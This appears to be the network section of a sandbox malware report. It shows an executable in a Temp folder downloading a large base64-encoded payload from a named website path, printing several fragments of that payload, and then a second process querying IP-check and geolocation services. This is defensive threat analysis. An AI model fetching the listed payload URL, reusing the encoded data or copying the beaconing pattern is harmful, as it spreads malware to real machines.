Dec 30, 2024 11:46:59.248358965 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.248538017 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.248553991 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.248603106 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.248610973 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.248661995 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.248961926 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.248977900 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.249027014 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.249034882 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.249058008 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.249072075 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.249223948 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.249239922 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.249322891 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.249331951 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.249368906 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.249660015 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.249675989 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.249792099 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.249799013 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.249844074 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.249998093 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.250013113 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.250065088 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.250072956 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.250116110 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.340374947 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.340400934 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.340440035 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.340476036 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.340511084 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.340528011 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.340528011 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.340575933 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.342758894 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.342789888 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:46:59.342803955 CET	49712	443	192.168.2.6	41.185.8.252
Dec 30, 2024 11:46:59.342812061 CET	443	49712	41.185.8.252	192.168.2.6
Dec 30, 2024 11:47:04.195811987 CET	49720	80	192.168.2.6	193.122.130.0
Dec 30, 2024 11:47:04.200601101 CET	80	49720	193.122.130.0	192.168.2.6
Dec 30, 2024 11:47:04.200700045 CET	49720	80	192.168.2.6	193.122.130.0
Dec 30, 2024 11:47:04.201746941 CET	49720	80	192.168.2.6	193.122.130.0
Dec 30, 2024 11:47:04.206542015 CET	80	49720	193.122.130.0	192.168.2.6
Dec 30, 2024 11:47:04.667391062 CET	80	49720	193.122.130.0	192.168.2.6
Dec 30, 2024 11:47:04.686238050 CET	49720	80	192.168.2.6	193.122.130.0
Dec 30, 2024 11:47:04.691031933 CET	80	49720	193.122.130.0	192.168.2.6
Dec 30, 2024 11:47:04.787921906 CET	80	49720	193.122.130.0	192.168.2.6
Dec 30, 2024 11:47:04.823014975 CET	49726	443	192.168.2.6	188.114.97.3
Dec 30, 2024 11:47:04.823070049 CET	443	49726	188.114.97.3	192.168.2.6
Dec 30, 2024 11:47:04.823152065 CET	49726	443	192.168.2.6	188.114.97.3
Dec 30, 2024 11:47:04.833676100 CET	49726	443	192.168.2.6	188.114.97.3
Dec 30, 2024 11:47:04.833694935 CET	443	49726	188.114.97.3	192.168.2.6
Dec 30, 2024 11:47:04.894030094 CET	49720	80	192.168.2.6	193.122.130.0
Dec 30, 2024 11:47:05.281771898 CET	443	49726	188.114.97.3	192.168.2.6
Dec 30, 2024 11:47:05.281919003 CET	49726	443	192.168.2.6	188.114.97.3
Dec 30, 2024 11:47:05.288009882 CET	49726	443	192.168.2.6	188.114.97.3
Dec 30, 2024 11:47:05.288021088 CET	443	49726	188.114.97.3	192.168.2.6
Dec 30, 2024 11:47:05.288311005 CET	443	49726	188.114.97.3	192.168.2.6
Dec 30, 2024 11:47:05.480159044 CET	49726	443	192.168.2.6	188.114.97.3
Dec 30, 2024 11:47:05.527339935 CET	443	49726	188.114.97.3	192.168.2.6
Dec 30, 2024 11:47:05.584780931 CET	443	49726	188.114.97.3	192.168.2.6
Dec 30, 2024 11:47:05.584850073 CET	443	49726	188.114.97.3	192.168.2.6
Dec 30, 2024 11:47:05.584933996 CET	49726	443	192.168.2.6	188.114.97.3
Dec 30, 2024 11:47:05.592060089 CET	49726	443	192.168.2.6	188.114.97.3
Dec 30, 2024 11:48:09.787547112 CET	80	49720	193.122.130.0	192.168.2.6
Dec 30, 2024 11:48:09.787607908 CET	49720	80	192.168.2.6	193.122.130.0
Dec 30, 2024 11:48:44.810112000 CET	49720	80	192.168.2.6	193.122.130.0
Dec 30, 2024 11:48:44.814949036 CET	80	49720	193.122.130.0	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 11:46:55.449709892 CET	50869	53	192.168.2.6	1.1.1.1
Dec 30, 2024 11:46:56.434976101 CET	53	50869	1.1.1.1	192.168.2.6
Dec 30, 2024 11:47:04.174577951 CET	62476	53	192.168.2.6	1.1.1.1
Dec 30, 2024 11:47:04.181809902 CET	53	62476	1.1.1.1	192.168.2.6
Dec 30, 2024 11:47:04.812261105 CET	51352	53	192.168.2.6	1.1.1.1
Dec 30, 2024 11:47:04.819380045 CET	53	51352	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 11:46:55.449709892 CET	192.168.2.6	1.1.1.1	0x5941	Standard query (0)	lwaziacademy.com	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:47:04.174577951 CET	192.168.2.6	1.1.1.1	0x51a1	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:47:04.812261105 CET	192.168.2.6	1.1.1.1	0xc644	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 11:46:56.434976101 CET	1.1.1.1	192.168.2.6	0x5941	No error (0)	lwaziacademy.com		41.185.8.252	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:47:04.181809902 CET	1.1.1.1	192.168.2.6	0x51a1	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 11:47:04.181809902 CET	1.1.1.1	192.168.2.6	0x51a1	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:47:04.181809902 CET	1.1.1.1	192.168.2.6	0x51a1	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:47:04.181809902 CET	1.1.1.1	192.168.2.6	0x51a1	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:47:04.181809902 CET	1.1.1.1	192.168.2.6	0x51a1	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:47:04.181809902 CET	1.1.1.1	192.168.2.6	0x51a1	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:47:04.819380045 CET	1.1.1.1	192.168.2.6	0xc644	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:47:04.819380045 CET	1.1.1.1	192.168.2.6	0xc644	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

lwaziacademy.com

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49720	193.122.130.0	80	3248	C:\Users\user\AppData\Local\Temp\Microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 11:47:04.201746941 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 30, 2024 11:47:04.667391062 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 10:47:04 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b7d8fbf45a1dd532928994469f047bae Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 30, 2024 11:47:04.686238050 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 30, 2024 11:47:04.787921906 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 10:47:04 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2c86fae7df26c71b629f27f1c6e108fe Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49712	41.185.8.252	443	5792	C:\Users\user\AppData\Local\Temp\x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:46:57 UTC	169	OUT	GET /wps/200_Oupzhkprnvw HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: lwaziacademy.com
2024-12-30 10:46:57 UTC	182	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 30 Dec 2024 10:46:57 GMT Content-Length: 906612 Connection: close Last-Modified: Fri, 20 Dec 2024 10:43:30 GMT Accept-Ranges: bytes
2024-12-30 10:46:57 UTC	15178	IN	Data Raw: 68 59 32 45 4f 41 4b 47 6b 43 72 2f 2f 76 72 74 2f 41 62 33 2f 41 54 74 41 66 54 74 39 51 55 43 38 50 66 74 37 76 30 41 41 50 54 76 2f 66 73 44 38 2f 66 74 2b 66 50 39 2b 76 6f 45 38 76 54 35 41 2f 48 75 2f 50 49 45 42 66 6b 46 39 77 62 76 39 41 62 31 2b 77 51 46 2f 76 44 76 41 4f 33 31 39 66 6a 7a 42 76 76 35 2b 75 2f 79 2f 66 44 34 2f 66 34 47 38 66 4c 30 41 76 62 30 37 2f 37 35 2b 34 57 4e 68 44 67 43 68 70 41 71 4f 51 48 38 42 76 54 33 2f 50 37 36 41 67 4f 46 6a 59 51 34 41 6f 61 51 4b 72 2b 37 70 70 65 49 7a 63 58 56 79 74 48 43 71 4d 54 44 7a 72 7a 4f 31 4a 2b 61 68 39 66 51 76 63 2f 42 32 4b 33 4b 78 63 62 56 79 37 36 6d 6a 6f 44 4a 78 4d 4b 37 7a 63 75 77 79 64 54 4f 31 63 6e 55 75 70 6d 51 7a 63 50 41 79 73 6d 37 6e 4d 62 51 78 74 6e 5a 32 5a 32 Data Ascii: hY2EOAKGkCr//vrt/Ab3/ATtAfTt9QUC8Pft7v0AAPTv/fsD8/ft+fP9+voE8vT5A/Hu/PIEBfkF9wbv9Ab1+wQF/vDvAO319fjzBvv5+u/y/fD4/f4G8fL0Avb07/75+4WNhDgChpAqOQH8BvT3/P76AgOFjYQ4AoaQKr+7ppeIzcXVytHCqMTDzrzO1J+ah9fQvc/B2K3KxcbVy76mjoDJxMK7zcuwydTO1cnUupmQzcPAysm7nMbQxtnZ2Z2
2024-12-30 10:46:58 UTC	16384	IN	Data Raw: 45 6f 35 64 57 37 71 43 52 42 39 77 79 2b 61 43 78 47 51 68 65 4f 61 52 72 33 56 34 32 6e 78 41 73 39 76 71 49 6b 55 50 48 45 51 65 48 4b 57 48 54 6a 67 50 31 66 66 52 76 4e 61 4e 43 48 75 44 38 4a 68 42 31 59 4d 7a 57 4e 6b 33 66 2b 59 4e 55 32 4d 62 51 45 2f 57 6d 71 68 37 62 35 30 58 73 73 65 4f 39 79 73 36 30 61 65 4c 41 6f 39 48 66 78 6c 69 30 55 49 63 69 71 45 70 44 4b 4e 75 59 34 45 6d 41 33 71 2f 59 78 78 57 4e 64 30 4b 53 64 55 4b 57 7a 71 4e 5a 2f 49 69 4d 4f 62 38 4b 57 34 61 41 54 39 6e 6a 4a 66 35 4f 77 47 4e 37 77 4b 6f 55 52 2b 43 54 59 51 34 75 57 6a 36 76 4a 4d 41 47 4b 79 73 6f 71 54 70 38 35 56 47 4b 4b 53 63 43 55 63 31 38 72 7a 45 2b 4f 6c 51 49 47 43 63 4b 70 37 6c 63 65 4f 38 4c 65 47 37 2f 4f 49 41 2b 63 4d 31 39 64 45 31 72 4a 79 Data Ascii: Eo5dW7qCRB9wy+aCxGQheOaRr3V42nxAs9vqIkUPHEQeHKWHTjgP1ffRvNaNCHuD8JhB1YMzWNk3f+YNU2MbQE/Wmqh7b50XsseO9ys60aeLAo9Hfxli0UIciqEpDKNuY4EmA3q/YxxWNd0KSdUKWzqNZ/IiMOb8KW4aAT9njJf5OwGN7wKoUR+CTYQ4uWj6vJMAGKysoqTp85VGKKScCUc18rzE+OlQIGCcKp7lceO8LeG7/OIA+cM19dE1rJy
2024-12-30 10:46:58 UTC	16384	IN	Data Raw: 73 55 4a 2b 69 53 31 77 49 71 64 42 31 2b 34 66 66 6a 71 42 58 43 56 65 65 4d 73 51 2b 47 71 44 4e 69 49 5a 78 5a 73 67 38 4e 32 52 73 37 77 57 47 48 78 45 46 65 77 59 38 6d 52 53 46 78 49 63 33 55 44 46 4b 67 64 4d 6e 71 42 41 52 6c 52 32 76 59 50 45 4a 64 36 79 75 6c 76 61 77 53 2f 66 7a 5a 6f 46 38 77 79 57 52 38 55 50 61 52 41 35 56 59 51 43 46 74 30 4c 62 47 4a 77 37 49 49 55 57 65 51 4b 72 44 52 44 56 45 65 45 49 66 5a 65 79 43 61 2f 75 6e 67 70 45 73 62 59 62 65 64 32 78 4d 47 5a 4f 2f 71 2b 48 77 46 55 38 58 50 52 4e 41 67 4a 6a 31 67 46 37 6e 4c 61 77 41 2f 5a 5a 37 2f 42 6d 78 34 38 62 33 4e 47 6c 6a 39 6f 7a 41 2f 51 78 48 2b 2f 31 32 48 4f 71 48 4a 54 75 43 37 52 35 4a 54 63 41 6b 68 48 55 36 41 4a 6d 62 34 5a 46 63 6d 45 75 44 49 37 65 37 6c Data Ascii: sUJ+iS1wIqdB1+4ffjqBXCVeeMsQ+GqDNiIZxZsg8N2Rs7wWGHxEFewY8mRSFxIc3UDFKgdMnqBARlR2vYPEJd6yulvawS/fzZoF8wyWR8UPaRA5VYQCFt0LbGJw7IIUWeQKrDRDVEeEIfZeyCa/ungpEsbYbed2xMGZO/q+HwFU8XPRNAgJj1gF7nLawA/ZZ7/Bmx48b3NGlj9ozA/QxH+/12HOqHJTuC7R5JTcAkhHU6AJmb4ZFcmEuDI7e7l
2024-12-30 10:46:58 UTC	16384	IN	Data Raw: 37 65 47 75 37 41 55 75 4e 79 76 4a 41 56 72 72 67 6f 61 33 32 5a 58 5a 47 46 74 67 2b 66 61 2f 72 78 48 71 2b 46 66 6d 70 54 73 2f 72 34 62 75 6f 38 51 39 45 43 46 39 36 4e 4f 2f 54 70 6f 59 6b 70 67 78 4b 4d 6f 68 4a 41 6f 5a 45 37 6c 6e 2b 50 76 50 4b 4f 65 56 72 54 4f 43 58 62 6d 77 76 57 47 61 38 32 45 61 41 74 72 57 65 71 64 6e 41 75 72 32 72 6a 66 79 64 52 76 76 70 6c 79 7a 32 50 39 4d 58 4c 35 58 33 66 2b 31 48 54 51 47 6c 39 73 31 44 41 45 5a 6c 6a 62 72 54 71 53 30 72 73 4a 30 50 69 4a 4d 59 6a 69 73 79 49 6b 4b 74 6f 58 63 5a 2b 50 45 4b 54 32 58 70 32 6b 36 50 53 2f 70 6b 42 66 45 38 7a 59 6f 47 74 34 67 58 48 75 6e 6a 30 4c 43 7a 51 39 76 34 68 33 2b 37 42 54 63 43 39 4f 59 76 6b 76 6c 38 42 4a 45 6d 48 38 74 56 4c 4f 79 46 6c 51 51 70 68 39 Data Ascii: 7eGu7AUuNyvJAVrrgoa32ZXZGFtg+fa/rxHq+FfmpTs/r4buo8Q9ECF96NO/TpoYkpgxKMohJAoZE7ln+PvPKOeVrTOCXbmwvWGa82EaAtrWeqdnAur2rjfydRvvplyz2P9MXL5X3f+1HTQGl9s1DAEZljbrTqS0rsJ0PiJMYjisyIkKtoXcZ+PEKT2Xp2k6PS/pkBfE8zYoGt4gXHunj0LCzQ9v4h3+7BTcC9OYvkvl8BJEmH8tVLOyFlQQph9
2024-12-30 10:46:58 UTC	16384	IN	Data Raw: 44 30 69 74 37 42 70 71 6c 6b 49 2b 76 44 67 69 4d 72 34 4e 77 33 4d 66 53 43 5a 58 2b 65 69 43 77 78 72 5a 75 4f 50 46 42 7a 4e 76 47 76 4f 74 54 53 78 71 74 39 39 44 6d 61 36 6f 34 37 67 4e 39 73 6a 79 5a 35 64 69 54 67 41 63 37 50 65 36 39 71 69 6d 50 4e 69 78 4c 6a 65 6e 6e 31 79 5a 6b 5a 37 75 45 6d 70 36 69 6a 78 45 7a 34 69 4d 62 67 58 56 46 54 57 31 37 59 4a 63 4a 50 32 72 57 41 62 6f 74 53 57 51 32 6d 62 44 6c 69 5a 34 66 5a 66 6f 33 66 39 4c 51 41 65 39 67 62 66 66 68 56 4d 67 4b 55 58 7a 7a 53 35 6c 36 52 6f 39 61 57 67 2f 4b 56 63 41 51 57 4f 46 68 79 44 61 50 79 35 79 63 67 4a 63 4f 62 4f 42 35 4d 5a 70 52 36 47 61 6d 4d 54 36 65 78 2f 61 66 41 54 59 62 6b 4c 6c 38 31 35 48 6f 61 7a 76 4f 6c 75 56 4d 2f 49 34 70 52 6e 67 47 68 44 4e 4a 78 4e Data Ascii: D0it7BpqlkI+vDgiMr4Nw3MfSCZX+eiCwxrZuOPFBzNvGvOtTSxqt99Dma6o47gN9sjyZ5diTgAc7Pe69qimPNixLjenn1yZkZ7uEmp6ijxEz4iMbgXVFTW17YJcJP2rWAbotSWQ2mbDliZ4fZfo3f9LQAe9gbffhVMgKUXzzS5l6Ro9aWg/KVcAQWOFhyDaPy5ycgJcObOB5MZpR6GamMT6ex/afATYbkLl815HoazvOluVM/I4pRngGhDNJxN
2024-12-30 10:46:58 UTC	16384	IN	Data Raw: 4f 45 64 76 70 2b 78 66 39 70 63 43 79 6e 57 4f 4c 63 63 34 6d 73 51 75 76 69 53 45 77 78 32 67 45 35 43 51 45 30 74 72 53 44 6e 33 52 63 62 63 48 37 6b 37 49 4f 70 46 71 4a 67 49 4f 47 41 7a 63 69 66 37 5a 68 31 55 42 67 54 34 6d 65 55 74 32 61 69 54 79 6f 65 61 50 7a 39 35 34 42 4b 4d 49 4d 6f 6e 63 4a 2f 56 44 4e 42 32 71 35 66 7a 46 6a 4e 4f 75 45 74 65 64 73 34 4d 6f 45 2b 64 75 42 78 49 52 6b 47 38 6d 73 2b 65 69 6e 32 67 70 6f 61 44 32 64 45 70 61 79 75 68 52 44 51 2b 48 76 78 4e 34 49 64 45 69 72 4a 36 32 66 51 33 39 76 54 59 69 61 70 78 73 76 50 71 79 4e 57 52 66 32 37 2b 4c 74 79 2b 76 30 41 79 6a 42 36 32 45 39 68 2f 42 39 31 55 31 6c 63 6f 5a 39 6f 6c 74 74 30 65 76 52 77 58 34 5a 47 6d 52 69 51 39 68 6c 71 48 54 55 44 4d 61 43 4c 79 72 55 61 Data Ascii: OEdvp+xf9pcCynWOLcc4msQuviSEwx2gE5CQE0trSDn3RcbcH7k7IOpFqJgIOGAzcif7Zh1UBgT4meUt2aiTyoeaPz954BKMIMoncJ/VDNB2q5fzFjNOuEteds4MoE+duBxIRkG8ms+ein2gpoaD2dEpayuhRDQ+HvxN4IdEirJ62fQ39vTYiapxsvPqyNWRf27+Lty+v0AyjB62E9h/B91U1lcoZ9oltt0evRwX4ZGmRiQ9hlqHTUDMaCLyrUa
2024-12-30 10:46:58 UTC	16384	IN	Data Raw: 63 70 36 33 79 31 68 61 6d 38 55 45 6e 76 66 61 58 71 56 4a 73 73 4c 2f 74 52 67 35 32 72 49 54 68 33 4b 56 56 2b 44 52 2f 32 48 44 44 54 58 4c 34 57 6d 4a 74 77 41 77 7a 73 31 65 66 5a 46 6e 70 42 61 4b 54 58 4e 76 76 4b 72 46 58 58 79 55 64 57 66 6f 47 69 6a 66 5a 33 58 6d 73 71 63 47 69 6b 68 34 49 34 4f 71 33 65 4f 61 51 39 37 32 6b 78 55 4b 4d 69 32 31 75 76 37 55 59 57 64 57 6e 67 71 69 54 39 43 51 4a 2f 55 61 66 72 33 39 44 31 74 65 36 66 4a 75 56 6a 48 75 4c 65 41 6d 6e 2b 7a 6d 36 57 57 59 33 71 4a 42 4e 71 50 4f 51 6e 42 53 31 47 41 36 43 49 61 54 4e 72 6d 44 31 68 56 58 4a 71 69 4b 4c 34 77 39 35 66 66 67 61 35 51 44 38 32 56 50 4c 67 77 6a 43 47 4a 6e 79 79 49 72 70 66 48 6a 50 66 4a 36 49 44 64 43 31 41 54 6f 41 69 62 67 5a 7a 2f 68 38 44 48 Data Ascii: cp63y1ham8UEnvfaXqVJssL/tRg52rITh3KVV+DR/2HDDTXL4WmJtwAwzs1efZFnpBaKTXNvvKrFXXyUdWfoGijfZ3XmsqcGikh4I4Oq3eOaQ972kxUKMi21uv7UYWdWngqiT9CQJ/Uafr39D1te6fJuVjHuLeAmn+zm6WWY3qJBNqPOQnBS1GA6CIaTNrmD1hVXJqiKL4w95ffga5QD82VPLgwjCGJnyyIrpfHjPfJ6IDdC1AToAibgZz/h8DH
2024-12-30 10:46:58 UTC	16384	IN	Data Raw: 62 70 59 39 65 30 39 6b 4e 75 46 2f 61 54 62 78 4a 2f 78 33 6b 6a 44 33 64 6e 36 6e 33 34 38 49 55 71 4f 62 2b 6a 78 34 45 2f 32 78 42 31 4c 6a 68 55 72 56 51 4f 4b 71 69 39 36 4a 56 42 47 35 6c 57 39 47 49 6a 30 65 66 35 58 2b 6a 38 63 64 53 71 44 55 73 68 4a 59 46 44 37 71 48 44 44 38 62 2f 6c 4a 48 4a 4b 2b 70 6b 6e 4f 79 6d 6b 31 78 6a 37 49 76 52 74 75 43 50 4a 5a 6e 65 71 41 33 58 51 62 6c 71 64 34 79 38 44 70 64 51 62 7a 4e 54 79 34 58 2b 71 67 33 4d 73 4a 47 4e 32 49 35 74 63 2b 50 54 41 44 6c 48 4b 50 61 59 67 6c 72 5a 48 31 56 2f 6e 6b 58 2f 32 2f 65 2b 4b 6a 6f 41 54 76 44 42 4f 65 71 48 2f 4f 43 77 43 77 63 74 2f 6c 4a 73 71 6b 6f 66 64 4a 42 74 31 33 46 43 51 36 6f 71 68 47 74 48 36 67 6b 68 5a 55 31 76 4d 74 57 63 70 61 41 54 79 36 33 38 72 Data Ascii: bpY9e09kNuF/aTbxJ/x3kjD3dn6n348IUqOb+jx4E/2xB1LjhUrVQOKqi96JVBG5lW9GIj0ef5X+j8cdSqDUshJYFD7qHDD8b/lJHJK+pknOymk1xj7IvRtuCPJZneqA3XQblqd4y8DpdQbzNTy4X+qg3MsJGN2I5tc+PTADlHKPaYglrZH1V/nkX/2/e+KjoATvDBOeqH/OCwCwct/lJsqkofdJBt13FCQ6oqhGtH6gkhZU1vMtWcpaATy638r
2024-12-30 10:46:58 UTC	1023	IN	Data Raw: 64 53 73 6b 6a 72 6d 2f 43 32 38 4d 41 4e 66 64 59 4d 6d 4e 71 37 6a 67 43 63 65 66 2b 4d 6e 69 37 34 4f 33 56 47 33 6a 49 75 6c 5a 44 69 55 4f 55 71 37 50 70 47 67 59 75 75 75 53 6d 65 56 73 4b 69 62 53 54 64 49 62 6e 77 35 42 34 67 41 75 52 4c 68 53 70 41 37 33 70 71 33 38 6a 31 52 54 31 58 62 42 57 32 73 68 32 7a 52 77 46 61 5a 42 64 6a 7a 42 2f 4c 6f 54 56 2b 35 37 62 42 50 52 74 74 5a 64 74 39 49 32 67 4f 39 51 46 70 64 33 41 4f 58 71 33 62 46 42 30 4a 58 41 6f 36 6e 76 65 48 44 49 58 51 6d 44 66 57 73 5a 5a 42 64 33 70 73 76 72 49 34 43 50 66 2f 4b 49 35 76 77 75 79 46 74 4f 31 70 48 37 4b 30 2b 76 34 71 79 4a 4e 44 42 57 42 54 73 4b 34 79 73 49 67 79 4c 48 31 63 47 4e 58 5a 2f 6b 77 65 4d 4d 6f 72 7a 66 38 4d 45 78 70 42 32 5a 70 39 4a 56 41 43 47 Data Ascii: dSskjrm/C28MANfdYMmNq7jgCcef+Mni74O3VG3jIulZDiUOUq7PpGgYuuuSmeVsKibSTdIbnw5B4gAuRLhSpA73pq38j1RT1XbBW2sh2zRwFaZBdjzB/LoTV+57bBPRttZdt9I2gO9QFpd3AOXq3bFB0JXAo6nveHDIXQmDfWsZZBd3psvrI4CPf/KI5vwuyFtO1pH7K0+v4qyJNDBWBTsK4ysIgyLH1cGNXZ/kweMMorzf8MExpB2Zp9JVACG
2024-12-30 10:46:58 UTC	16384	IN	Data Raw: 78 49 6d 4b 54 5a 38 5a 34 4c 54 50 43 53 6d 35 52 48 68 2b 4b 48 46 6f 33 45 61 77 46 4a 52 7a 45 4b 41 75 46 42 67 63 78 36 2f 56 38 38 36 49 75 2b 53 4a 76 4b 61 73 71 73 4b 6c 33 43 41 74 41 79 64 39 4c 75 35 6b 4e 55 68 2b 6f 68 4d 57 2b 37 66 48 4f 7a 68 45 4c 45 4f 6c 68 53 4c 39 5a 66 2f 6f 58 56 54 6b 43 6a 75 4f 37 56 55 4e 6b 58 53 76 67 67 4a 63 55 78 4d 49 48 50 65 4d 6b 44 58 42 7a 48 4e 77 56 34 58 72 38 6e 51 36 56 6b 39 4c 34 58 5a 77 6f 5a 58 56 72 74 4b 4b 33 46 57 67 45 64 4f 77 42 6c 72 48 41 35 68 4b 68 4e 64 48 4e 63 32 2f 2b 4a 4a 74 52 47 54 78 2f 52 4b 6a 77 43 79 58 51 47 66 67 4f 48 31 35 6e 65 6f 47 39 79 41 39 43 36 43 4e 38 75 38 63 41 4a 67 4b 37 46 6d 2f 6a 43 74 43 31 37 31 79 51 56 44 6b 51 55 47 69 37 6f 7a 46 61 30 52 Data Ascii: xImKTZ8Z4LTPCSm5RHh+KHFo3EawFJRzEKAuFBgcx6/V886Iu+SJvKasqsKl3CAtAyd9Lu5kNUh+ohMW+7fHOzhELEOlhSL9Zf/oXVTkCjuO7VUNkXSvggJcUxMIHPeMkDXBzHNwV4Xr8nQ6Vk9L4XZwoZXVrtKK3FWgEdOwBlrHA5hKhNdHNc2/+JJtRGTx/RKjwCyXQGfgOH15neoG9yA9C6CN8u8cAJgK7Fm/jCtC171yQVDkQUGi7ozFa0R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49726	188.114.97.3	443	3248	C:\Users\user\AppData\Local\Temp\Microsofts.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:47:05 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
